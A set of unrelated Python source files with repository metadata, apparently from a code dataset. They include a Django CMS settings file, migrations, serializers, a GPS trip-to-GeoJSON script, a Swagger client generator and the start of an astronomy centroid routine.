ofp = open(nombre, "wb")
ofp.write(respuesta.read())
# Aumentar volumen
#cancion = AudioSegment.from_mp3(aux)
# Aumentar decibelios
#cancion = cancion + 10
#cancion.export(nombre, "mp3")
if nombre != None:
nombre = ruta
return "PLAY %s" % nombre
def procesarLista(idioma, fichero):
ifp = open(fichero)
for linea in ifp:
linea = linea.strip()
obtenerMP3(idioma, linea, nombre = linea + ".mp3")
ifp.close()
return
#if __name__=="__main__":
# import sys, argparse
# ejemplo = "%s --idioma ES --mensaje 'HOLA' --nombre fichero.mp3" % sys.argv[0]
# parser = argparse.ArgumentParser( description=ejemplo )
# parser.add_argument('--idioma', "-i", help = 'Idioma: Japonés = ja, Inglés = en, etc.', required = True )
# parser.add_argument('--mensaje', "-m", help = 'Texto a sintetizar.', default = None )
# parser.add_argument('--lista', "-l", help = 'Fichero a procesar, una frase por línea.', default = None )
# parser.add_argument('--nombre', "-n", help = 'Fichero de salida .mp3', default = None )
# args = parser.parse_args()
# if not args.mensaje==None:
# obtenerMP3(args.idioma, args.mensaje, args.nombre)
# elif not args.lista==None:
# procesarLista(args.idioma, args.lista)
# else:
# print "Introduza un mensaje (--mensaje) o una lista (--lista)."
| [
"castrofernandez@gmail.com"
] | castrofernandez@gmail.com |
6f8a8a50c61f791fef940b294a8727acd288d83c | 87a45d33ec91923fa2d299ca60e62cc48692241b | /mysite/settings.py | 5fb92d3ca47006ee609df4aaad2d72f1d181f68f | [] | no_license | reda-z/tutorial-project | 2b16348a21e50c85eb74f75be5bb209c00ed942f | 7fc776ba052ed265cd4e3148ee08fc4f8ffab2c3 | refs/heads/master | 2021-01-12T02:29:53.333570 | 2017-01-04T18:17:44 | 2017-01-04T18:17:44 | 78,040,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,107 | py | import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '42p#j+4pu_ol_(op=uowd$i%mx1aruev0gx*k&(he8*7_4!&e9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'fr'
TIME_ZONE = 'Africa/Casablanca'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
STATIC_ROOT = os.path.join(DATA_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'mysite', 'static'),
)
SITE_ID = 1
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'mysite', 'templates'),],
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.i18n',
'django.core.context_processors.debug',
'django.core.context_processors.request',
'django.core.context_processors.media',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'sekizai.context_processors.sekizai',
'django.core.context_processors.static',
'cms.context_processors.cms_settings'
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader'
],
},
},
]
MIDDLEWARE_CLASSES = (
'cms.middleware.utils.ApphookReloadMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
'cms.middleware.page.CurrentPageMiddleware',
'cms.middleware.toolbar.ToolbarMiddleware',
'cms.middleware.language.LanguageCookieMiddleware'
)
INSTALLED_APPS = (
'djangocms_admin_style',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'django.contrib.messages',
'cms',
'menus',
'sekizai',
'treebeard',
'djangocms_text_ckeditor',
'filer',
'easy_thumbnails',
'djangocms_column',
'djangocms_link',
'cmsplugin_filer_file',
'cmsplugin_filer_folder',
'cmsplugin_filer_image',
'cmsplugin_filer_utils',
'djangocms_style',
'djangocms_snippet',
'djangocms_googlemap',
'djangocms_video',
'mysite',
'bookstore',
)
LANGUAGES = (
## Customize this
('fr', gettext('fr')),
)
CMS_LANGUAGES = {
## Customize this
'default': {
'public': True,
'hide_untranslated': False,
'redirect_on_fallback': True,
},
1: [
{
'public': True,
'code': 'fr',
'hide_untranslated': False,
'name': gettext('fr'),
'redirect_on_fallback': True,
},
],
}
CMS_TEMPLATES = (
## Customize this
('fullwidth.html', 'Fullwidth'),
('sidebar_left.html', 'Sidebar Left'),
('sidebar_right.html', 'Sidebar Right')
)
CMS_PERMISSION = True
CMS_PLACEHOLDER_CONF = {}
DATABASES = {
'default': {
'CONN_MAX_AGE': 0,
'ENGINE': 'django.db.backends.sqlite3',
'HOST': 'localhost',
'NAME': 'project.db',
'PASSWORD': '',
'PORT': '',
'USER': ''
}
}
MIGRATION_MODULES = {
}
THUMBNAIL_PROCESSORS = (
'easy_thumbnails.processors.colorspace',
'easy_thumbnails.processors.autocrop',
'filer.thumbnail_processors.scale_and_crop_with_subject_location',
'easy_thumbnails.processors.filters'
)
| [
"reda.zejli@gmail.com"
] | reda.zejli@gmail.com |
8f5bee079852dc9e9cd1c52553ced73e436572ca | e433c8e129234e41454a3f029e41251f17920fc0 | /home/migrations/0006_auto_20181120_1245.py | 87229c2304b061262c08f0d9675937947e094487 | [] | no_license | exabyteso/wagtail-demo | ab25cbfa2f9857190273ab952d4ab24f14fef214 | 1fbef9e4703902b1c50962d6f50bf0c814367cca | refs/heads/master | 2020-04-07T12:47:19.050913 | 2018-11-20T11:57:07 | 2018-11-20T11:57:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | # Generated by Django 2.1.3 on 2018-11-20 09:45
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0040_page_draft_title'),
('wagtailforms', '0003_capitalizeverbose'),
('wagtailredirects', '0006_redirect_increase_max_length'),
('contenttypes', '0002_remove_content_type_name'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('home', '0005_auto_20181120_1143'),
]
operations = [
migrations.RenameModel(
old_name='HomePage',
new_name='IndexPage',
),
]
| [
"infoptwo@gmail.com"
] | infoptwo@gmail.com |
473e17e63cc27ca761242cf6b609a7acca46f363 | 26fae5c7fb11bffecbab2d5ddcd34cd4cec0cea1 | /PMDM/misitio/polls/serializers.py | 21c24e6fbfdadcfb3809168a5f0cfaafc65aae5a | [] | no_license | JorgeDuenasLerin/desarrollo-web | 75879d4a5bbc2ce3bab3b34016b970a1636dd53b | 2367a9be4af1c8e8e9c21700b9f70d20d6273718 | refs/heads/main | 2023-05-28T05:51:25.627808 | 2021-06-17T09:25:24 | 2021-06-17T09:25:24 | 314,196,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | from django.contrib.auth.models import User, Group
from rest_framework import serializers
from .models import Question, Choice
class QuestionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Question
fields = ['question_text', 'pub_date']
class ChoiceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Choice
fields = ['choice_text', 'votes']
| [
"jorge.duenas.lerin@gmail.com"
] | jorge.duenas.lerin@gmail.com |
77160378e0aff096aa646eaca4addb171b24a317 | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res_bw/scripts/common/lib/encodings/hz.py | fc3d801e512648fcedb54a7c040b1b2914c9941b | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,131 | py | # 2016.05.01 15:29:55 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/encodings/hz.py
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('hz')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(name='hz', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter)
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\encodings\hz.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:29:55 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
e94d85abd6706eef8bb60e86ee3dcc66668f2edf | 3c943b9d0117bd9e06dde1ea8370ccb9582fb0c5 | /bwp/participant/models.py | a26cdaa339fd442a2606ad967a5431c5255d8665 | [] | no_license | lbt/boss-web-participant | e4f013bb13cd09e4c953b83922308d2ea57e2e76 | b2f89109f677c49f80333fecf2a1a31c5c1916b9 | refs/heads/master | 2023-04-28T01:48:01.230173 | 2021-04-29T13:09:08 | 2021-04-29T13:09:08 | 359,830,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | from django.db import models
# class BOSS(models.Model):
# """The BOSS instance a Participant is connected to.
# """
# name = models.CharField(
# help_text="Name of the BOSS instance",
# max_length=80)
# config_name = models.CharField(
# help_text="Section name of the BOSS connection details in skynet.conf",
# max_length=80)
class Participant(models.Model):
"""A participant that can interact with BOSS
An instance of a Participant defines the amqp queue used and the
class that provides the consume """
name = models.CharField(
help_text="Name",
max_length=80)
queue = models.CharField(
help_text="AMQP message queue being monitored",
max_length=80)
# boss = models.ForeignKey(BOSS)
def store(self, wid):
self.db_participant.job_set.create(
workitem=wid)
class Job(models.Model):
"""Stores a job for a Participant interaction with BOSS
"""
participant = models.ForeignKey(Participant, on_delete=models.CASCADE)
workitem = models.JSONField(
help_text="process workitem for a Participant interaction")
| [
"david.greaves@jolla.com"
] | david.greaves@jolla.com |
9f191ec4a9cd5f99bda20cd89210ad2823c881a6 | b7cb29e3d4ec89f294695a4405df322455bfdb62 | /Exercise13ParametersUnpackingVariables/ex13.py | 297af801f679508fc21acb1e1535d0a8c1483e10 | [
"MIT"
] | permissive | CaptShaw/learn-python-the-hard-way | 0e86e88615e60d6dddd189f87556cf30f844883e | 48328a126ab47fdac371c82b79dc2047541a4dd7 | refs/heads/master | 2020-04-10T08:39:20.580479 | 2018-12-08T10:00:22 | 2018-12-08T10:00:22 | 160,910,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | # -*- coding: UTF-8 -*-
from sys import argv
#script, first, second, third = argv
script = argv
#从用户输入中获得参数
first = raw_input(),
second = raw_input(),
third = raw_input()
print "The script is called:", script
print "Your first variable is:", first
print "Your second variable is:", second
print "Your third variable is:", third
| [
"remember_m1@qq.com"
] | remember_m1@qq.com |
6fae34308cd664decc0ad86974d5ad045c8d9d68 | 7af5288111965b8bbcdfcd21fcf9db1f2e886741 | /point_to_path_measurement.py | 742e4e4ebcc00750b26d9257ebc1950227237cc5 | [] | no_license | GeoTecINIT/CyclingPathAnalysis | fc65b506da5f9365ed1fa7595fa3e16a3e54c581 | fb54af19b6dd217ffd224b4ec87e18ab8045c35e | refs/heads/master | 2020-03-14T02:39:14.968754 | 2018-04-27T17:11:56 | 2018-04-27T17:11:56 | 131,403,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,722 | py | """
This script allow us to convert a list of coordinates into a string geometry
It does not consider the information of trips
It just considers location, distance and time
Author: Diego Pajarito
"""
import datetime
import data_setup as data
import geojson
from LatLon import LatLon, Latitude, Longitude
from geojson import FeatureCollection, Feature, LineString
import pandas as pd
location = data.getLocation()
measurement = data.getMeasurement()
def build_feature(ftr_geometry, ftr_properties):
ftr = Feature(properties=ftr_properties, geometry=ftr_geometry)
if ftr.is_valid:
return ftr
else:
print(ftr)
return False
def get_start_stop_linestring(point):
tp = []
tp.append(point)
tp.append(point)
return LineString(tp)
def get_generic_linestring():
pt = (0, 0)
pt1 = (0.0001, 0.001)
return LineString([pt, pt1])
def build_trip_feature(properties, points):
linestring = LineString(points)
if linestring.is_valid:
feature = build_feature(linestring, properties)
else:
if len(points) == 1:
ls = LineString(get_start_stop_linestring(points[0]))
feature = build_feature(ls, properties)
print ("trip with only one point: " + str(properties))
else:
ls = LineString(get_generic_linestring())
feature = build_feature(ls, properties)
print ("Trip with empty Linestring: " + str(properties))
return feature
def build_segment_feature(properties, start_point, end_point):
ls = LineString([start_point, end_point])
if ls.is_valid:
feature = build_feature(ls, properties)
else:
ls = LineString(get_generic_linestring())
feature = build_feature(ls, properties)
print ("Segment with empty Linestring: " + str(properties))
return feature
def get_distance(point1, point2):
point1_coordinates = LatLon(Latitude(point1[1]), Longitude(point1[0]))
point2_coordinates = LatLon(Latitude(point2[1]), Longitude(point2[0]))
distance = point1_coordinates.distance(point2_coordinates)
return distance * 1000
def get_last_speed(device, time):
values = measurement[measurement.measurement == 'speed']
values = values[values.device == device]
values = values[values.time_device < time]
if values.size > 1:
values_sort = values.sort_values('time_device', ascending=False)
value = values_sort['value'].iloc[0] * 3.6
else:
value = -1
return value
def get_last_distance_a(device, time):
values = measurement[measurement.measurement == 'distance']
values = values[values.device == device]
values = values[values.time_device < time]
if values.size > 1:
values_sort = values.sort_values('time_device', ascending=False)
value = values_sort['value'].iloc[0]
else:
value = -1
return value
def get_last_distance_b(device, time):
values = measurement[measurement.measurement == 'last_distance']
values = values[values.device == device]
values = values[values.time_device < time]
if values.size > 1:
values_sort = values.sort_values('time_device', ascending=False)
value = values_sort['value'].iloc[0]
else:
value = -1
return value
def main():
trip_points = []
feature_segments = []
feature_trips = []
new_trip = True
trip_count = 0
location_sort = location.sort_values(['device', 'time_gps'])
for i, row in location_sort.iterrows():
lat = location['latitude'][i]
lon = location['longitude'][i]
alt = location['altitude'][i]
device = location['device'][i]
precision = location['precision'][i]
timestamp = pd.to_datetime(location_sort['time_gps'][i])
point = (lon, lat, alt)
if new_trip:
new_trip = False
segment_count = 1
trip_count = trip_count + 1
trip_points.append(point)
segment_start = timestamp
trip_start = timestamp
last_point = point
last_device = device
last_timestamp = timestamp
else:
distance = get_distance(last_point, point)
time_difference_min = pd.Timedelta(timestamp - last_timestamp).total_seconds() / 60
if distance > 500 or time_difference_min > 5 or last_device != device:
properties_trip = {'device': last_device, 'start_time': str(trip_start), 'end_time': str(last_timestamp),
'trip_count': trip_count, 'point_count': len(trip_points)}
feature_trip = build_trip_feature(properties_trip, trip_points)
if feature_trip:
feature_trips.append(feature_trip)
trip_count = trip_count + 1
trip_start = timestamp
trip_points = [point]
segment_start = timestamp
segment_count = 1
last_point = point
last_device = device
last_timestamp = timestamp
else:
last_distance_a = get_last_distance_a(device, location_sort['time_gps'][i])
last_distance_b = get_last_distance_b(device, location_sort['time_gps'][i])
last_speed = get_last_speed(device, location_sort['time_gps'][i])
if time_difference_min == 0:
speed_geometry = 0
else:
speed_geometry = (distance / 1000) / (time_difference_min / 60)
# get last distance
properties_segment = {'device': device, 'start_time': str(segment_start), 'end_time': str(timestamp),
'segment_count': segment_count, 'distance_geometry': distance,
'last_distance_a': last_distance_a, 'last_distance_b': last_distance_b,
'speed_geometry': speed_geometry, 'last_speed': last_speed,
'precision_end': precision, 'trip_count': trip_count}
feature_segment = build_segment_feature(properties_segment, last_point, point)
if feature_segment:
feature_segments.append(feature_segment)
trip_points.append(point)
segment_start = timestamp
segment_count = segment_count + 1
last_point = point
last_device = device
last_timestamp = timestamp
# last point to build a trip
properties_trip = {'device': last_device, 'start_time': str(trip_start), 'end_time': str(last_timestamp),
'trip_count': trip_count, 'point_count': len(trip_points)}
feature_trip = build_trip_feature(properties_trip, trip_points)
if feature_trip:
feature_trips.append(feature_trip)
feature_collection_trips = FeatureCollection(feature_trips)
print("Trips Feature collection is valid: " + str(feature_collection_trips.is_valid))
with open('./output/trips_raw.geojson', 'w') as outfile:
geojson.dump(feature_collection_trips, outfile)
feature_collection_segments = FeatureCollection(feature_segments)
print("Segments Feature collection is valid: " + str(feature_collection_segments.is_valid))
with open('./output/segments_raw.geojson', 'w') as outfile:
geojson.dump(feature_collection_segments, outfile)
print("Processed %d points, finished at %s" % {location.size, str(datetime.datetime.now().time())})
if __name__ == "__main__":
print ("Processing started at %s" % str(datetime.datetime.now().time()))
main()
| [
"diegopajarito@gmail.com"
] | diegopajarito@gmail.com |
83c9387d3bb198cf419d2f3ec2dff2bcd9a76c86 | 6209990e3e90f8ca6d0b6cf737b96ad5e9317253 | /my_utils.py | 5b257efb3d417704b07dff888789a21ca633ff42 | [] | no_license | oxnoctisxo/JamGame | cb44e4abc46a19a9e3d4ac67a04d90ee7d979c6d | 3fd5a66ce95dc5ea233201dad7b299d2032517eb | refs/heads/master | 2020-05-01T05:08:25.210226 | 2019-03-24T14:39:29 | 2019-03-24T14:39:29 | 177,293,135 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | from parametters import *
import pygame
| [
"tip.hon@hotmail.fr"
] | tip.hon@hotmail.fr |
bef9b323e645e5c7ef9d02812aa2e7372a98a288 | 1bb98607ddc47884bfe6b2f8e874699e63b528e1 | /main.spec | 98c5705f4febeba77a2fdae29b50d63685420cf2 | [] | no_license | 15011283031/HumanResourcesAss | eacce2c8a165f86c8feef7b5e26b0e8ceb34bc21 | 11e3533335e21dcf770aa60894e3714ba41bcb2c | refs/heads/master | 2021-01-25T09:09:41.548439 | 2018-02-17T07:59:11 | 2018-02-17T07:59:11 | 93,790,201 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 849 | spec | # -*- mode: python -*-
block_cipher = None
a = Analysis(['main.py'],
pathex=['e:\\KM\\GITPROJECT\\HumanResourcesAss'],
binaries=[],
datas=[],
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
exclude_binaries=True,
name='main',
debug=False,
strip=False,
upx=True,
console=True )
coll = COLLECT(exe,
a.binaries,
a.zipfiles,
a.datas,
strip=False,
upx=True,
name='main')
| [
"peterchenhra@hotmail.com"
] | peterchenhra@hotmail.com |
3fa9a93f57ccc1bf4090937e244429eb7f71e4a5 | 51386da3c244c1182a4e414ce1401d699c235fa2 | /mainapp/migrations/0003_auto_20210319_2321.py | c763d5a4e92f2019cfaa02b649656a806698e3bc | [] | no_license | bad-us/geekshop | dd134fc47e378d2fc5637b3ad17dfd263429dd0a | e11b9aa3f874eb5ec92b2bbf3e09a463848b120c | refs/heads/Lesson_2 | 2023-07-15T08:45:00.054415 | 2021-08-31T07:57:49 | 2021-08-31T07:57:49 | 393,031,273 | 0 | 0 | null | 2021-08-31T12:05:04 | 2021-08-05T12:19:12 | Python | UTF-8 | Python | false | false | 618 | py | # Generated by Django 3.1.7 on 2021-03-19 20:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0002_product'),
]
operations = [
migrations.AddField(
model_name='product',
name='is_active',
field=models.BooleanField(default=True, verbose_name='активность'),
),
migrations.AddField(
model_name='productcategory',
name='is_active',
field=models.BooleanField(default=True, verbose_name='активность'),
),
]
| [
"bad-us@rambler.ru"
] | bad-us@rambler.ru |
f666007ac359fe79e9a2e479632c88e69a740821 | f061602595a78bdbdbf32e2dfdcfe623db5b8efd | /graph/migrations/0002_auto__add_field_overviewstat_money.py | 7f104131f6fd659ce917758a30319a93e5f569c5 | [] | no_license | NorbertMichalski/utilities | b9e0643d4b8e0097e0c774d63adbeaa66d3da06b | da27a23add9c42d62ae21a5e74eef920bbd3d839 | refs/heads/master | 2020-05-14T19:04:23.262384 | 2014-01-27T13:45:28 | 2014-01-27T13:45:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,893 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'OverviewStat.money'
db.add_column(u'graph_overviewstat', 'money',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=9, decimal_places=2),
keep_default=False)
def backwards(self, orm):
# Deleting field 'OverviewStat.money'
db.delete_column(u'graph_overviewstat', 'money')
models = {
u'graph.overviewgraph': {
'Meta': {'ordering': "['id']", 'object_name': 'OverviewGraph'},
'brand': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'graph.overviewstat': {
'Meta': {'object_name': 'OverviewStat'},
'date': ('django.db.models.fields.DateField', [], {'default': 'datetime.date.today'}),
'graph': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['graph.OverviewGraph']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'money': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '9', 'decimal_places': '2'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '6', 'decimal_places': '2'}),
'rank': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '5', 'decimal_places': '2'}),
'sales': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visits': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['graph'] | [
"Norbertmichalski16@gmail.com"
] | Norbertmichalski16@gmail.com |
19fd98493afa75d8472719a61a2fb2a168e3a8e0 | f948811d028d7b4313b38877d383e9920a4fdb25 | /codegen.py | 214594ca7d0334690567a44c8d15bb3f573dbc94 | [] | no_license | silencewwt/Psyduck | fdf8a286dd233fca3c15d7e3ccd9a26e53376c5a | 0635a63941e0e0f342b55367f5a8a8fd12d7e4b6 | refs/heads/master | 2020-03-25T08:19:43.514746 | 2018-08-06T16:37:04 | 2018-08-06T16:37:04 | 143,607,165 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,555 | py | # -*- coding: utf-8 -*-
import json
import re
import click
REGEX = re.compile('((?:[A-Z]?[a-z\d]+)|(?:[A-Z\d]+))')
class Generator(object):
def __init__(self, output, swagger):
self.file = open(output, 'w', encoding='utf-8')
self.indent_level = 0
with open(swagger, mode='r', encoding='utf-8') as fp:
self.swagger = json.load(fp)
def write(self, s):
self.file.write(s)
def writeln(self, s):
self.write(s)
self.newline()
def revert_indent(self, level=1):
self.write('\n\n')
self.indent_level -= level
self.write(' ' * self.indent_level)
def indent(self):
self.write(' ')
self.indent_level += 1
def newline(self):
self.write('\n')
self.write(' ' * self.indent_level)
def flush(self):
self.file.flush()
def close(self):
self.file.close()
def class_begin(self):
self.write('class BitmexAdapter(metaclass=RequestMeta):\n')
self.newline()
self.indent()
self.write_method('__init__', ['client'], [])
self.indent()
self.write('self.client = client')
self.revert_indent()
def write_doc(self, s):
self.writeln('"""')
self.writeln(s)
self.writeln('"""')
def gen(self):
self.file_doc()
self.newline()
self.writeln('from psyduck.client.meta import RequestMeta')
self.newline()
self.newline()
self.class_begin()
for path, detail in self.swagger['paths'].items():
for method, api in detail.items():
self.write_api(api)
self.revert_indent()
self.flush()
self.close()
def file_doc(self):
info = self.swagger['info']
s = '{}\n\n{}'.format(info['title'], info['description'])
self.write_doc(s)
def write_api(self, api):
method = self.get_method_name(api['operationId'])
params = api['parameters']
args = [p['name'] for p in params if p['required']]
kwargs = [p['name'] for p in params if not p['required']]
self.write_method(method, args, kwargs)
self.indent()
self.write_api_doc(api)
self.write_call(api)
self.revert_indent()
def write_method(self, method, args, kwargs):
self.write('def {method}(self'.format(method=method))
if args:
self.write(', ')
self.write(', '.join(map(self.snake_format, args)))
if kwargs:
self.write(', ')
self.write(', '.join(
['{}=None'.format(self.snake_format(k)) for k in kwargs]
))
self.write('):')
self.newline()
def write_api_doc(self, api):
self.writeln('"""')
self.writeln(api['summary'])
self.newline()
for param in api['parameters']:
desc = self.format_param_desc(param.get('description', ''))
self.writeln(
':param {}: {}'.format(self.snake_format(param['name']), desc)
)
self.writeln('"""')
def write_call(self, api):
args = [p['name'] for p in api['parameters']]
tag = api['tags'][0]
method = api['operationId'].replace('.', '_')
self.write(
'return self.client.{tag}.{method}('.format(tag=tag, method=method)
)
self.write(', '.join(['{}={}'.format(
arg, self.snake_format(arg)) for arg in args]
))
self.write(').result()')
def format_param_desc(self, desc):
text = '\n' + ' ' * self.indent_level
return desc.replace('\n\n', text)
@classmethod
def get_method_name(cls, operation_id):
"""Get method name from operation_id
eg:
Order.getOrders -> get_orders
OrderBook.getL2 -> get_order_book_l2
"""
tag, method = operation_id.split('.')
words = re.findall(REGEX, method)
if len(words) > 1 and (tag == words[1] or tag + 's' == words[1]):
return cls.snake_format(''.join(words))
return cls.snake_format(''.join([words[0], tag] + words[1:]))
@classmethod
def snake_format(cls, string):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', string)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
@click.command()
@click.option('--output', '-o')
@click.option('--swagger', '-s')
def generate(output, swagger):
Generator(output, swagger).gen()
if __name__ == '__main__':
generate()
| [
"silencewwt@gmail.com"
] | silencewwt@gmail.com |
3cd9816aa15459e15cbade31bc4234a1e433e840 | bc84258382756f5a2e1382813ce68f6148acc33a | /cntrd.py | 0444e1056807de47433cc38ceda157eea2bf8888 | [
"MIT"
] | permissive | dragozzine/hstfakes | 6604978c4a78a19936c3e5192b3917558b2d7f67 | a73971686a9189106b0e6a8039e581f649a1acf0 | refs/heads/master | 2021-05-28T08:57:41.402475 | 2014-07-24T17:41:49 | 2014-07-24T17:41:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,657 | py | #!/usr/bin/env python
# D. Jones - 2/13/14
"""This code is from the IDL Astronomy Users Library"""
import numpy as np
def cntrd(img, x, y,
fwhm, silent=False,
debug=False,
extendbox = False,
keepcenter = False):
""";+
; NAME:
; CNTRD
; PURPOSE:
; Compute the centroid of a star using a derivative search
; EXPLANATION:
; CNTRD uses an early DAOPHOT "FIND" centroid algorithm by locating the
; position where the X and Y derivatives go to zero. This is usually a
; more "robust" determination than a "center of mass" or fitting a 2d
; Gaussian if the wings in one direction are affected by the presence
; of a neighboring star.
;
; CALLING SEQUENCE:
; CNTRD, img, x, y, xcen, ycen, [ fwhm , /KEEPCENTER, /SILENT, /DEBUG
; EXTENDBOX = ]
;
; INPUTS:
; IMG - Two dimensional image array
; X,Y - Scalar or vector integers giving approximate integer stellar
; center
;
; OPTIONAL INPUT:
; FWHM - floating scalar; Centroid is computed using a box of half
; width equal to 1.5 sigma = 0.637* FWHM. CNTRD will prompt
; for FWHM if not supplied
;
; OUTPUTS:
; XCEN - the computed X centroid position, same number of points as X
; YCEN - computed Y centroid position, same number of points as Y,
; floating point
;
; Values for XCEN and YCEN will not be computed if the computed
; centroid falls outside of the box, or if the computed derivatives
; are non-decreasing. If the centroid cannot be computed, then a
; message is displayed and XCEN and YCEN are set to -1.
;
; OPTIONAL OUTPUT KEYWORDS:
; /SILENT - Normally CNTRD prints an error message if it is unable
; to compute the centroid. Set /SILENT to suppress this.
; /DEBUG - If this keyword is set, then CNTRD will display the subarray
; it is using to compute the centroid.
; EXTENDBOX = {non-negative positive integer}. CNTRD searches a box with
; a half width equal to 1.5 sigma = 0.637* FWHM to find the
; maximum pixel. To search a larger area, set EXTENDBOX to
; the number of pixels to enlarge the half-width of the box.
; Default is 0; prior to June 2004, the default was EXTENDBOX= 3
; /KeepCenter = By default, CNTRD finds the maximum pixel in a box
; centered on the input X,Y coordinates, and then extracts a new
; box about this maximum pixel. Set the /KeepCenter keyword
; to skip then step of finding the maximum pixel, and instead use
; a box centered on the input X,Y coordinates.
; PROCEDURE:
; Maximum pixel within distance from input pixel X, Y determined
; from FHWM is found and used as the center of a square, within
; which the centroid is computed as the value (XCEN,YCEN) at which
; the derivatives of the partial sums of the input image over (y,x)
; with respect to (x,y) = 0. In order to minimize contamination from
; neighboring stars stars, a weighting factor W is defined as unity in
; center, 0.5 at end, and linear in between
;
; RESTRICTIONS:
; (1) Does not recognize (bad) pixels. Use the procedure GCNTRD.PRO
; in this situation.
